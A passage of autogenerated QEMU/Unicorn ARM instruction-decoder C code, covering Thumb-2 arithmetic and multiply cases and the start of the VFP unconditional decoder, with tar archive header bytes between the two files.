/mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:579 */ if (trans_QSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00500020: /* 11111010 1101.... 1111.... 0010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:580 */ if (trans_SHSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00600000: /* 11111010 1110.... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:585 */ if (trans_SSAX(ctx, &u.f_rrr)) return true; return false; case 0x00600010: /* 11111010 1110.... 1111.... 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:586 */ if (trans_QSAX(ctx, &u.f_rrr)) return true; return false; case 0x00600020: /* 11111010 1110.... 1111.... 0010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:587 */ if (trans_SHSAX(ctx, &u.f_rrr)) return true; return false; } return false; case 0x0080f040: /* 11111010 1....... 1111.... 01...... */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00700030) { case 0x00000000: /* 11111010 1000.... 1111.... 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:553 */ if (trans_UADD8(ctx, &u.f_rrr)) return true; return false; case 0x00000010: /* 11111010 1000.... 1111.... 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:554 */ if (trans_UQADD8(ctx, &u.f_rrr)) return true; return false; case 0x00000020: /* 11111010 1000.... 1111.... 0110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:555 */ if (trans_UHADD8(ctx, &u.f_rrr)) return true; return false; case 0x00100000: /* 11111010 1001.... 1111.... 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:560 */ if (trans_UADD16(ctx, &u.f_rrr)) return true; return false; case 0x00100010: /* 11111010 1001.... 1111.... 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:561 */ if (trans_UQADD16(ctx, &u.f_rrr)) return true; return false; case 0x00100020: /* 11111010 1001.... 1111.... 0110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:562 */ if (trans_UHADD16(ctx, &u.f_rrr)) return true; return false; case 0x00200000: /* 11111010 1010.... 1111.... 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:567 */ if (trans_UASX(ctx, &u.f_rrr)) return true; return false; case 0x00200010: /* 11111010 1010.... 1111.... 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:568 */ if (trans_UQASX(ctx, &u.f_rrr)) return true; return false; case 0x00200020: /* 11111010 1010.... 1111.... 0110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:569 */ if (trans_UHASX(ctx, &u.f_rrr)) return true; return false; case 0x00400000: /* 11111010 1100.... 1111.... 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:574 */ if (trans_USUB8(ctx, &u.f_rrr)) return true; return false; case 0x00400010: /* 11111010 1100.... 1111.... 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:575 */ if (trans_UQSUB8(ctx, &u.f_rrr)) return true; return false; case 0x00400020: /* 11111010 1100.... 1111.... 0110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:576 */ if (trans_UHSUB8(ctx, &u.f_rrr)) return true; return false; case 0x00500000: /* 11111010 1101.... 1111.... 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:581 */ if (trans_USUB16(ctx, &u.f_rrr)) return true; return false; case 0x00500010: /* 11111010 1101.... 1111.... 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:582 */ if (trans_UQSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00500020: /* 11111010 1101.... 1111.... 0110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:583 */ if (trans_UHSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00600000: /* 11111010 1110.... 1111.... 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:588 */ if (trans_USAX(ctx, &u.f_rrr)) return true; return false; case 0x00600010: /* 11111010 1110.... 1111.... 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:589 */ if (trans_UQSAX(ctx, &u.f_rrr)) return true; return false; case 0x00600020: /* 11111010 1110.... 1111.... 0110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:590 */ if (trans_UHSAX(ctx, &u.f_rrr)) return true; return false; } return false; case 0x0080f080: /* 11111010 1....... 1111.... 10...... */ switch (insn & 0x00700030) { case 0x00000000: /* 11111010 1000.... 1111.... 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:262 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_QADD(ctx, &u.f_rrr)) return true; return false; case 0x00000010: /* 11111010 1000.... 1111.... 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:264 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_QDADD(ctx, &u.f_rrr)) return true; return false; case 0x00000020: /* 11111010 1000.... 1111.... 1010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:263 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_QSUB(ctx, &u.f_rrr)) return true; return false; case 0x00000030: /* 11111010 1000.... 1111.... 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:265 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_QDSUB(ctx, &u.f_rrr)) return true; return false; case 0x00100000: /* 11111010 1001.... 1111.... 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:277 */ disas_t32_extract_rdm(ctx, &u.f_rr, insn); if (trans_REV(ctx, &u.f_rr)) return true; return false; case 0x00100010: /* 11111010 1001.... 1111.... 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:278 */ disas_t32_extract_rdm(ctx, &u.f_rr, insn); if (trans_REV16(ctx, &u.f_rr)) return true; return false; case 0x00100020: /* 11111010 1001.... 1111.... 1010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:279 */ disas_t32_extract_rdm(ctx, &u.f_rr, insn); if (trans_RBIT(ctx, &u.f_rr)) return true; return false; case 0x00100030: /* 11111010 1001.... 1111.... 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:280 */ disas_t32_extract_rdm(ctx, &u.f_rr, insn); if (trans_REVSH(ctx, &u.f_rr)) return true; return false; case 0x00200000: /* 11111010 1010.... 1111.... 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:274 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_SEL(ctx, &u.f_rrr)) return true; return false; case 0x00300000: /* 11111010 1011.... 1111.... 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:281 */ disas_t32_extract_rdm(ctx, &u.f_rr, insn); if (trans_CLZ(ctx, &u.f_rr)) return true; return false; case 0x00400000: /* 11111010 1100.... 1111.... 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:267 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_CRC32B(ctx, &u.f_rrr)) return true; return false; case 0x00400010: /* 11111010 1100.... 1111.... 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:268 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_CRC32H(ctx, &u.f_rrr)) return true; return false; case 0x00400020: /* 11111010 1100.... 1111.... 1010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:269 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_CRC32W(ctx, &u.f_rrr)) return true; return false; case 0x00500000: /* 11111010 1101.... 1111.... 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:270 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_CRC32CB(ctx, &u.f_rrr)) return true; return false; case 0x00500010: /* 11111010 1101.... 1111.... 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:271 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_CRC32CH(ctx, &u.f_rrr)) return true; return false; case 0x00500020: /* 11111010 1101.... 1111.... 1010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:272 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_CRC32CW(ctx, &u.f_rrr)) return true; return false; } return false; } return false; case 0x3: /* 11111011 ........ ........ ........ */ switch (insn & 0x00f000f0) { case 0x00000000: /* 11111011 0000.... ........ 0000.... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111011 0000.... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:201 */ disas_t32_extract_s0_rn0dm(ctx, &u.f_s_rrrr, insn); if (trans_MUL(ctx, &u.f_s_rrrr)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:202 */ disas_t32_extract_s0_rnadm(ctx, &u.f_s_rrrr, insn); if (trans_MLA(ctx, &u.f_s_rrrr)) return true; return false; case 0x00000010: /* 11111011 0000.... ........ 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:204 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_MLS(ctx, &u.f_rrrr)) return true; return false; case 0x00100000: /* 11111011 0001.... ........ 0000.... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111011 0001.... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:219 */ disas_t32_extract_rn0dm(ctx, &u.f_rrrr, insn); if (trans_SMULBB(ctx, &u.f_rrrr)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:220 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLABB(ctx, &u.f_rrrr)) return true; return false; case 0x00100010: /* 11111011 0001.... ........ 0001.... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111011 0001.... 1111.... 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:223 */ disas_t32_extract_rn0dm(ctx, &u.f_rrrr, insn); if (trans_SMULBT(ctx, &u.f_rrrr)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:224 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLABT(ctx, &u.f_rrrr)) return true; return false; case 0x00100020: /* 11111011 0001.... ........ 0010.... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111011 0001.... 1111.... 0010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:227 */ disas_t32_extract_rn0dm(ctx, &u.f_rrrr, insn); if (trans_SMULTB(ctx, &u.f_rrrr)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:228 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLATB(ctx, &u.f_rrrr)) return true; return false; case 0x00100030: /* 11111011 0001.... ........ 0011.... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111011 0001.... 1111.... 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:231 */ disas_t32_extract_rn0dm(ctx, &u.f_rrrr, insn); if (trans_SMULTT(ctx, &u.f_rrrr)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:232 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLATT(ctx, &u.f_rrrr)) return true; return false; case 0x00200000: /* 11111011 0010.... ........ 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:242 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLAD(ctx, &u.f_rrrr)) return true; return false; case 0x00200010: /* 11111011 0010.... ........ 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:243 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLADX(ctx, &u.f_rrrr)) return true; return false; case 0x00300000: /* 11111011 0011.... ........ 0000.... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111011 0011.... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:211 */ disas_t32_extract_rn0dm(ctx, &u.f_rrrr, insn); if (trans_SMULWB(ctx, &u.f_rrrr)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:212 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLAWB(ctx, &u.f_rrrr)) return true; return false; case 0x00300010: /* 11111011 0011.... ........ 0001.... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111011 0011.... 1111.... 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:215 */ disas_t32_extract_rn0dm(ctx, &u.f_rrrr, insn); if (trans_SMULWT(ctx, &u.f_rrrr)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:216 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLAWT(ctx, &u.f_rrrr)) return true; return false; case 0x00400000: /* 11111011 0100.... ........ 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:244 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLSD(ctx, &u.f_rrrr)) return true; return false; case 0x00400010: /* 11111011 0100.... ........ 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:245 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLSDX(ctx, &u.f_rrrr)) return true; return false; case 0x00500000: /* 11111011 0101.... ........ 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:252 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMMLA(ctx, &u.f_rrrr)) return true; return false; case 0x00500010: /* 11111011 0101.... ........ 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:253 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMMLAR(ctx, &u.f_rrrr)) return true; return false; case 0x00600000: /* 11111011 0110.... ........ 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:254 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMMLS(ctx, &u.f_rrrr)) return true; return false; case 0x00600010: /* 11111011 0110.... ........ 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:255 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMMLSR(ctx, &u.f_rrrr)) return true; return false; case 0x00700000: /* 11111011 0111.... ........ 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:240 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_USADA8(ctx, &u.f_rrrr)) return true; return false; case 0x00800000: /* 11111011 1000.... ........ 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:205 */ disas_t32_extract_s0_rnadm(ctx, &u.f_s_rrrr, insn); if (trans_SMULL(ctx, &u.f_s_rrrr)) return true; return false; case 0x009000f0: /* 11111011 1001.... ........ 1111.... */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); switch ((insn >> 12) & 0xf) { case 0xf: /* 11111011 1001.... 1111.... 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:257 */ if (trans_SDIV(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00a00000: /* 11111011 1010.... ........ 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:206 */ disas_t32_extract_s0_rnadm(ctx, &u.f_s_rrrr, insn); if (trans_UMULL(ctx, &u.f_s_rrrr)) return true; return false; case 0x00b000f0: /* 11111011 1011.... ........ 1111.... */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); switch ((insn >> 12) & 0xf) { case 0xf: /* 11111011 1011.... 1111.... 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:258 */ if (trans_UDIV(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00c00000: /* 11111011 1100.... ........ 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:207 */ disas_t32_extract_s0_rnadm(ctx, &u.f_s_rrrr, insn); if (trans_SMLAL(ctx, &u.f_s_rrrr)) return true; return false; case 0x00c00080: /* 11111011 1100.... ........ 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:234 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLALBB(ctx, &u.f_rrrr)) return true; return false; case 0x00c00090: /* 11111011 1100.... ........ 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:235 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLALBT(ctx, &u.f_rrrr)) return true; return false; case 0x00c000a0: /* 11111011 1100.... ........ 1010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:236 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLALTB(ctx, &u.f_rrrr)) return true; return false; case 0x00c000b0: /* 11111011 1100.... ........ 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:237 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLALTT(ctx, &u.f_rrrr)) return true; return false; case 0x00c000c0: /* 11111011 1100.... ........ 1100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:247 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLALD(ctx, &u.f_rrrr)) return true; return false; case 0x00c000d0: /* 11111011 1100.... ........ 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:248 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLALDX(ctx, &u.f_rrrr)) return true; return false; case 0x00d000c0: /* 11111011 1101.... ........ 1100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:249 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLSLD(ctx, &u.f_rrrr)) return true; return false; case 0x00d000d0: /* 11111011 1101.... ........ 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:250 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLSLDX(ctx, &u.f_rrrr)) return true; return false; case 0x00e00000: /* 11111011 1110.... ........ 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:208 */ disas_t32_extract_s0_rnadm(ctx, &u.f_s_rrrr, insn); if (trans_UMLAL(ctx, &u.f_s_rrrr)) return true; return false; case 0x00e00060: /* 11111011 1110.... ........ 0110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:209 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_UMAAL(ctx, &u.f_rrrr)) return true; return false; } return false; } return false; } return false; } ��������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/decode-vfp-uncond.inc.c�����������������������������������������������0000664�0000000�0000000�00000022371�14675241067�0022441�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* This file is autogenerated by scripts/decodetree.py. */ typedef struct { int vd; int vm; int vn; } arg_disas_vfp_uncond0; typedef struct { int cc; int dp; int vd; int vm; int vn; } arg_disas_vfp_uncond1; typedef struct { int dp; int rm; int vd; int vm; } arg_disas_vfp_uncond2; typedef struct { int dp; int op; int rm; int vd; int vm; } arg_disas_vfp_uncond3; typedef arg_disas_vfp_uncond1 arg_VSEL; static bool trans_VSEL(DisasContext *ctx, arg_VSEL *a); typedef arg_disas_vfp_uncond0 arg_VMAXNM_sp; static bool trans_VMAXNM_sp(DisasContext *ctx, arg_VMAXNM_sp *a); typedef arg_disas_vfp_uncond0 arg_VMINNM_sp; static bool trans_VMINNM_sp(DisasContext *ctx, arg_VMINNM_sp *a); typedef arg_disas_vfp_uncond0 arg_VMAXNM_dp; static bool trans_VMAXNM_dp(DisasContext *ctx, arg_VMAXNM_dp *a); typedef arg_disas_vfp_uncond0 arg_VMINNM_dp; static bool trans_VMINNM_dp(DisasContext *ctx, arg_VMINNM_dp *a); typedef arg_disas_vfp_uncond2 arg_VRINT; static bool trans_VRINT(DisasContext *ctx, arg_VRINT *a); typedef arg_disas_vfp_uncond3 arg_VCVT; static bool trans_VCVT(DisasContext *ctx, arg_VCVT *a); static void disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_2(DisasContext *ctx, arg_disas_vfp_uncond1 *a, uint32_t insn) { a->cc = extract32(insn, 20, 2); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); a->vn = deposit32(extract32(insn, 7, 1), 1, 31, extract32(insn, 16, 4)); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->dp = 0; } static void disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_3(DisasContext *ctx, arg_disas_vfp_uncond1 *a, uint32_t insn) { a->cc = extract32(insn, 20, 2); a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); a->dp = 1; } static void disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_4(DisasContext *ctx, arg_disas_vfp_uncond2 *a, uint32_t insn) { a->rm = extract32(insn, 16, 2); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->dp = 0; } static void disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_5(DisasContext *ctx, arg_disas_vfp_uncond2 *a, uint32_t insn) { a->rm = extract32(insn, 16, 2); a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); a->dp = 1; } static void disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_6(DisasContext *ctx, arg_disas_vfp_uncond3 *a, uint32_t insn) { a->rm = extract32(insn, 16, 2); a->op = extract32(insn, 7, 1); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->dp = 0; } static void disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_7(DisasContext *ctx, arg_disas_vfp_uncond3 *a, uint32_t insn) { a->rm = extract32(insn, 16, 2); a->op = extract32(insn, 7, 1); a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->dp = 1; } static void disas_vfp_uncond_extract_vfp_dnm_d(DisasContext *ctx, arg_disas_vfp_uncond0 *a, uint32_t insn) { a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); } static void disas_vfp_uncond_extract_vfp_dnm_s(DisasContext *ctx, arg_disas_vfp_uncond0 *a, uint32_t insn) { a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); a->vn = deposit32(extract32(insn, 7, 1), 1, 31, extract32(insn, 16, 4)); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); } static bool disas_vfp_uncond(DisasContext *ctx, uint32_t insn) { union { arg_disas_vfp_uncond0 f_disas_vfp_uncond0; arg_disas_vfp_uncond1 f_disas_vfp_uncond1; arg_disas_vfp_uncond2 f_disas_vfp_uncond2; arg_disas_vfp_uncond3 f_disas_vfp_uncond3; } u; switch (insn & 0xff800f50) { case 0xfe000a00: /* 11111110 0....... ....1010 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:47 */ disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_2(ctx, &u.f_disas_vfp_uncond1, insn); if (trans_VSEL(ctx, &u.f_disas_vfp_uncond1)) return true; return false; case 0xfe000b00: /* 11111110 0....... ....1011 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:49 */ disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_3(ctx, &u.f_disas_vfp_uncond1, insn); if (trans_VSEL(ctx, &u.f_disas_vfp_uncond1)) return true; return false; case 0xfe800a00: /* 11111110 1....... ....1010 .0.0.... */ disas_vfp_uncond_extract_vfp_dnm_s(ctx, &u.f_disas_vfp_uncond0, insn); switch ((insn >> 20) & 0x3) { case 0x0: /* 11111110 1.00.... ....1010 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:52 */ if (trans_VMAXNM_sp(ctx, &u.f_disas_vfp_uncond0)) return true; return false; } return false; case 0xfe800a40: /* 11111110 1....... ....1010 .1.0.... */ switch ((insn >> 20) & 0x3) { case 0x0: /* 11111110 1.00.... ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:53 */ disas_vfp_uncond_extract_vfp_dnm_s(ctx, &u.f_disas_vfp_uncond0, insn); if (trans_VMINNM_sp(ctx, &u.f_disas_vfp_uncond0)) return true; return false; case 